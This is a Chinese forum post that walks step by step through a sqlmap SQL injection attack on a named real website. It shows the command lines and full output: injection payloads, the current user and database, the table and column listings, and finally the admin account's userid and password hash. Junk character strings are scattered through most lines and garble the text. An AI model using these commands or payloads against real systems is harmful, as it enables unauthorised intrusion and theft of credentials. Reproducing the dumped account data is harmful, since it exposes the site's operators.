找回密码
 立即注册
查看: 2703|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
3 \) F5 c5 `6 g5 P9 Qms "Mysql" --current-user       /*  注解:获取当前用户名称2 C) `" {9 a; e
    sqlmap/0.9 - automatic SQL injection and database takeover tool$ `9 |7 _$ ?/ H
    http://sqlmap.sourceforge.net
  • starting at: 16:53:545 U, Z$ H2 j. W/ a! x( l
    [16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    2 ^+ {* L, b9 V) t session file" P, p: D7 W$ f& V' X
    [16:53:54] [INFO] resuming injection data from session file
    - O) y; u/ E3 R% j3 R- S4 Z+ g+ b[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file$ p; E  K# b# E* U* W: v
    [16:53:54] [INFO] testing connection to the target url
    5 z) T3 T- ]$ ~  Y  C9 xsqlmap identified the following injection points with a total of 0 HTTP(s) reque8 R% M. |$ m  R
    sts:3 ^% y' l. I/ D+ `) Q. q1 v
    ---
    ) @2 |% K+ J' d0 oPlace: GET
    & ^) \9 U) H" v. f6 ]( ^6 E5 ~2 bParameter: id& K6 }/ m) C8 I* D5 H3 M
        Type: boolean-based blind2 D( k8 s) n- k) L$ q5 B5 @
        Title: AND boolean-based blind - WHERE or HAVING clause
    $ M$ A0 S7 W. ~: ^+ W, F; v    Payload: id=276 AND 799=799! E7 g: b0 w5 Y8 d
        Type: error-based
      y3 C0 y% U* D3 _) D    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    ; a2 [2 r" Y! Q- _5 V3 w    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    1 \; q) C: }, I/ e120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    . S4 ^# J( K; N# {& k+ y# V),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    ! c( t0 }# h- H    Type: UNION query, V( s# L4 @% y4 d  v
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    4 F8 v+ P% o% [8 `9 H    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR, Z7 u& t& Q' N+ ~! |3 @: V
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    % Q5 K' m- U5 y9 R( h' a$ tCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    ) g$ T' l' {, q, d' P5 @# H    Type: AND/OR time-based blind1 p$ ]9 O! z. V% t0 f/ b
        Title: MySQL > 5.0.11 AND time-based blind; c3 T, q9 W1 v4 E* Z0 v8 `
        Payload: id=276 AND SLEEP(5)" @: D) I/ Y# Z" K
    ---* G3 O' ^& m; @$ S3 ^1 l
    [16:53:55] [INFO] the back-end DBMS is MySQL
    $ L' j' l0 p2 ?  Dweb server operating system: Windows
    & G6 X* j% I9 i7 k3 Tweb application technology: Apache 2.2.11, PHP 5.3.0
    ' o8 B1 }6 _% R4 ^back-end DBMS: MySQL 5.0
    0 b8 Z5 \* h& `6 [& v" X% @" ?: E[16:53:55] [INFO] fetching current user/ Z, S+ z+ s& s& [: }. l
    current user:    'root@localhost'   & ^& N* N3 k1 W6 j' R* Z% [
    [16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou2 M, a0 f$ M2 P0 E2 s
    tput\www.wepost.com.hk'
  • shutting down at: 16:53:58( B$ W1 `1 H4 Y& M
    . f& G; Y1 H- o8 C: m
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db# ^7 x3 {. z: ~
    ms "Mysql" --current-db                  /*当前数据库% i% E# u1 s2 o
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    ! ~  L5 W3 G, P' z; ^+ k    http://sqlmap.sourceforge.net
  • starting at: 16:54:168 i( D" k% N. l+ D( Y
    [16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as9 ~% f/ P4 i  R8 i! b
    session file3 e" T' U. m+ U9 W* b' m# ^
    [16:54:16] [INFO] resuming injection data from session file  Z8 g% ?. N- N" z6 P
    [16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file) J% M9 G; [& C/ M$ {
    [16:54:16] [INFO] testing connection to the target url
    ' i) I& |& s0 W) `: msqlmap identified the following injection points with a total of 0 HTTP(s) reque
    . a4 E( D2 [+ S  G  l4 {* msts:
    # Q# f7 R, C' M---
    9 v5 t5 M, U; [# _/ C/ z' t; S, }$ t3 T4 wPlace: GET# C0 c( D& r2 Q3 |% ~1 Z/ i  U, a; p4 a
    Parameter: id4 i9 M1 B5 g) t4 r
        Type: boolean-based blind. x! e8 e0 c/ o8 w& Q& v1 `. g1 s+ ^
        Title: AND boolean-based blind - WHERE or HAVING clause5 y2 A6 S( J- N+ c' x2 ^1 g
        Payload: id=276 AND 799=799
    2 ]1 O* V- i! P) M2 B    Type: error-based0 e+ @! k* ?; b, w  K! R: U
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause1 J/ X" z" ]6 j  F7 X% z3 R! v. f
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,8 [9 K( D* @# T0 g4 _
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,582 `3 b0 a' }3 s! ~: R- o
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a); ~, x  A2 |( h! B6 h+ b
        Type: UNION query
    ; ^) }& L! U2 d2 v    Title: MySQL UNION query (NULL) - 1 to 10 columns
    1 }# F+ V8 e. p9 c8 O7 p7 i3 J    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR  N2 d; d, c8 x# ]7 U: M
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),& z) O0 ]! _  H4 [: `
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#/ f2 L# o% U- I. L+ t1 r1 p  S
        Type: AND/OR time-based blind
    $ j# l' d: u& v/ P3 b) X" A    Title: MySQL > 5.0.11 AND time-based blind# N9 n3 U3 I; W5 o. F7 B
        Payload: id=276 AND SLEEP(5)
    3 w4 }7 s% Z( y6 S---
    + M5 x  D7 l; m$ h- g7 b[16:54:17] [INFO] the back-end DBMS is MySQL+ b  m7 w2 c! M' g
    web server operating system: Windows2 s  R9 K, x- {
    web application technology: Apache 2.2.11, PHP 5.3.0
      y7 d, D2 {# D9 _back-end DBMS: MySQL 5.08 Y) Y9 q) g7 t0 d+ ]
    [16:54:17] [INFO] fetching current database
    0 T: V) b' E7 c/ m0 a! t5 x% Xcurrent database:    'wepost'. J9 y9 v/ w/ e
    [16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    , g: F, r. {2 f7 }tput\www.wepost.com.hk'
  • shutting down at: 16:54:185 q! l% M- ], T. x$ @' Q
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    ; F% {7 u4 G3 m: A, X; M$ wms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名
    ! F# J9 T! w% d$ Z    sqlmap/0.9 - automatic SQL injection and database takeover tool; ~  V! Z' e& O; H4 p
        http://sqlmap.sourceforge.net
  • starting at: 16:55:25
    : T! Y' V$ J7 Q( G9 d3 E[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    % r4 X9 k- x' P$ ~& U+ ^! m. Q! [  | session file' M, W7 Y* Z& s+ A5 c
    [16:55:25] [INFO] resuming injection data from session file
    ! g8 L) I- o, v[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    ' P) L- Y3 ]+ ][16:55:25] [INFO] testing connection to the target url$ g% C5 h: S/ C8 u! ^7 P0 R
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque& g7 ?, J4 p, v# Y1 o& P
    sts:
    ) p* t8 Z* m: I6 x) q) p---
    $ M9 d- o( H+ Y$ U# N3 v; k. S* a4 _2 IPlace: GET
    : C/ j  H1 @- m2 n% UParameter: id
    7 W5 [! s7 b/ g5 D7 H3 g( u6 \    Type: boolean-based blind, X: ~; w- ]9 p+ Q* J
        Title: AND boolean-based blind - WHERE or HAVING clause
      ?3 k& g( G' @* l- K    Payload: id=276 AND 799=799
    1 I3 S& S% E/ m' ]    Type: error-based
    / [# U* d5 j9 g1 N    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    , z7 `4 Q3 v# U* L. y) ]    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    , h: s' H1 y  H, d6 n- ^  |& [120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58! U* M$ R- [( y7 c. T- {
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    . z# y2 V- ^; r* F. a; Q    Type: UNION query
    0 y8 q% f, w0 w8 L3 `. v. j    Title: MySQL UNION query (NULL) - 1 to 10 columns
      N: @3 a, W8 U    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR6 \5 [5 ?0 A* O) L% o
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    ; J" H! ?$ e+ ^- d, R' d8 sCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    4 o/ D# W7 T$ k  {, V% B    Type: AND/OR time-based blind; l7 m# i% e: C! p5 S
        Title: MySQL > 5.0.11 AND time-based blind: T. y6 V2 X# q+ |2 @" o8 x
        Payload: id=276 AND SLEEP(5)& F5 b6 s( F! a5 s# _8 k3 l
    ---5 O; c3 h3 ]8 q( a
    [16:55:26] [INFO] the back-end DBMS is MySQL: W8 _" i) z" L1 R. t
    web server operating system: Windows5 ^. x7 C$ h! U
    web application technology: Apache 2.2.11, PHP 5.3.0! V# Y% D# Q) R2 S/ a1 t4 d3 n# x
    back-end DBMS: MySQL 5.03 ~( o6 _8 P2 Q* l
    [16:55:26] [INFO] fetching tables for database 'wepost'
    # G; N1 s3 k3 c9 P0 [[16:55:27] [INFO] the SQL query used returns 6 entries
    2 _6 t: [# X# }/ ^9 r" W* w8 Q3 aDatabase: wepost
    * n0 Y5 @. D' K  O[6 tables]
    : g0 C  }; R& h7 x' D' d* m. S+-------------+) k3 A4 A$ j4 s; K/ `9 n8 Y
    | admin       |6 q5 ~9 s5 o$ Q8 q, ]+ F+ d; K
    | article     |
    / M- F6 K7 V' e% |! g| contributor |
    + r* N9 S$ ?9 J+ c| idea        |; ~) p4 d$ D: Q6 S! L# O
    | image       |9 V7 d. M" `, p+ r6 B
    | issue       |
    % s  w0 S8 g  O( a* S& z+-------------+* U! s: L4 v* b$ |* [& i# c
    [16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou+ r+ B- d5 ?# C, y1 A, j* e3 E
    tput\www.wepost.com.hk'
  • shutting down at: 16:55:33
    0 r- h/ O& a" M) b3 j6 K9 p) M# N6 Y5 j6 e
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    # ?. G5 @% d2 G( C% E( w  v1 Vms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名2 v$ t6 v; q- f$ d
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    9 j* \5 l& _/ T8 ?6 @    http://sqlmap.sourceforge.net
  • starting at: 16:56:06
    0 o) w5 a# _! s/ T1 O3 jsqlmap identified the following injection points with a total of 0 HTTP(s) reque2 Q$ p/ D. z/ M5 H% e  f7 F
    sts:
    - S. _0 G; H- }6 W& T---; n( ^/ ^" U$ P3 T
    Place: GET
    ( N* \3 j, g, F9 p- W2 ^* k0 Q2 vParameter: id$ w/ z' P' ?% c/ R' J, ]' U
        Type: boolean-based blind' G* p$ ]7 O: P" y3 r
        Title: AND boolean-based blind - WHERE or HAVING clause8 w1 P6 y7 |# [0 d! A9 W/ b
        Payload: id=276 AND 799=799, h2 ^1 \) G7 F: h+ Z" ~3 B
        Type: error-based: t. h% s2 i. a8 ^
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause8 ~" `7 O! k$ Z- D, e+ z2 d
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    3 N  N9 {; D5 z6 R120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58; A2 u- Z9 X# W! h  n' D
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    5 }( C# B0 t* G7 b4 ~# m. x    Type: UNION query5 u9 J8 \7 [: A9 i( t
        Title: MySQL UNION query (NULL) - 1 to 10 columns, q4 q) n: `4 I5 O: [' U
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    ( T/ B' m' e8 e/ b(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),) c) g( b( X, s9 @" V
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#+ G# @6 f4 X+ g; a- \1 x: _& f
        Type: AND/OR time-based blind: T7 L' t6 {+ X4 p; q5 o5 U' Z
        Title: MySQL > 5.0.11 AND time-based blind
    ( s0 q0 o1 W/ o4 o& b. q    Payload: id=276 AND SLEEP(5)5 ^4 [9 w! k: e$ A2 c3 a8 s
    ---+ M7 R  P/ z6 w' A" O. K. L
    web server operating system: Windows- Z- {7 j0 i4 E1 _- _6 h
    web application technology: Apache 2.2.11, PHP 5.3.0" a" C8 h3 k( a: p& Q2 Y
    back-end DBMS: MySQL 5.0
    * r" ?. X: I8 v% R7 Q2 K9 W: F[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
    # t7 e9 `, _7 \ssion': wepost, wepost
    7 I* U& C! X. }; q8 BDatabase: wepost/ I9 W* I  V! R/ x
    Table: admin
    " D/ [0 C3 A% b6 d0 `5 }[4 columns]* O0 l: O: Q6 i& e
    +----------+-------------+
    9 @) R) P* o* b: q' C: Z| Column   | Type        |7 a. g0 F  O! Z0 v
    +----------+-------------+
    - r: v2 }' v1 O| id       | int(11)     |
    , }; I- A5 E. h" _/ q5 w| password | varchar(32) |
    ( i4 e; T) R0 {: L* p| type     | varchar(10) |8 V; q5 {. z, |" [# N) Z
    | userid   | varchar(20) |
    + @) L9 K  _) S9 z7 l1 c" N; M/ `+----------+-------------+
    ' _9 N9 @' ?0 b& ]8 \
  • shutting down at: 16:56:195 ?0 ~+ W9 m1 R! v+ G2 F4 D
    . c: o- I; F' T5 K
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db2 ~8 X* E: M* \6 c- t7 O) d  f- ]
    ms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容& R. P  m4 m9 x7 K+ H" }
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    ' |9 r9 f- @( N; ]6 w2 A* c    http://sqlmap.sourceforge.net
  • starting at: 16:57:14! w$ ?7 }6 s+ ~$ Y6 d+ k! n
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque7 o6 a5 t( v, ?8 K
    sts:. f2 {* ^8 ]  Z! }, H5 N, S
    ---
    3 }3 X' {% y0 T3 [. V4 UPlace: GET: _$ e8 f' Z. C* @+ [' i  @/ P
    Parameter: id
    4 \' i' f7 N, c' @+ e    Type: boolean-based blind5 b5 v9 e. U" X; O) A/ i1 B: O
        Title: AND boolean-based blind - WHERE or HAVING clause) H. v0 S. h% u" q
        Payload: id=276 AND 799=799
    3 }# i+ N$ {0 Y$ L& r6 N$ d/ k    Type: error-based
    3 @" f4 d6 `- T% Z1 @0 w9 L    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause" g  Z8 `1 D+ X4 A; [# K% H
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    - o5 ^! ?$ B9 J+ m' H- y2 Y7 z120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    9 |- j+ D  m3 y) j, T),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)1 ^  T/ c0 |* F" l# |
        Type: UNION query
    0 i% V+ l4 T& w0 @- q% f. B& P% a    Title: MySQL UNION query (NULL) - 1 to 10 columns
    ' m8 M# f, _$ K; ?$ Z8 n6 C, U. ]    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR2 f; Z( R; Y2 [2 P$ a7 g" A, r
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    / d+ j7 i2 U1 z( ^2 |. qCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#. O8 l0 n) x1 L7 }% N
        Type: AND/OR time-based blind
      j3 F6 m  G9 e4 a/ y- _    Title: MySQL > 5.0.11 AND time-based blind1 O8 m% [# S, _2 Y. C3 d
        Payload: id=276 AND SLEEP(5)
    6 o) z5 n+ j& K. q4 e( t) N---; S# ]2 O& o3 T4 s
    web server operating system: Windows6 B* H/ T3 i( O# I: L
    web application technology: Apache 2.2.11, PHP 5.3.0
    " f4 e0 X  R* t! q, d; E* oback-end DBMS: MySQL 5.0% V* J5 t9 `) t+ w$ ?2 [4 {7 R
    recognized possible password hash values. do you want to use dictionary attack o
    4 }% X+ r5 J% H% a* R, nn retrieved table items? [Y/n/q] y
    , O2 w9 R3 j0 z( i% G, a& wwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]: O, D' e  d6 l& G/ c  p( @
    do you want to use common password suffixes? (slow!) [y/N] y
    * N; m$ \5 Z5 V- T* W$ N1 mDatabase: wepost( V  O8 m; [: @
    Table: admin* f6 s0 |# x1 m
    [1 entry]+ X& G3 t2 v) O7 r
    +----------------------------------+------------+4 x, v5 r- d, F) R: w) J& P
    | password                         | userid     |
    6 b5 u+ M+ O/ w, a( k) [' I" m+----------------------------------+------------+1 `) ^9 D( r6 |9 X
    | 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
    . d) v: b2 f- q9 f+----------------------------------+------------+
      ~5 k: K  l( ~3 s
  • shutting down at: 16:58:14" ?; Y& N/ l: R" L( H# u/ i; u
    5 O$ S0 I5 t. P( P: S+ l( B
    D:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表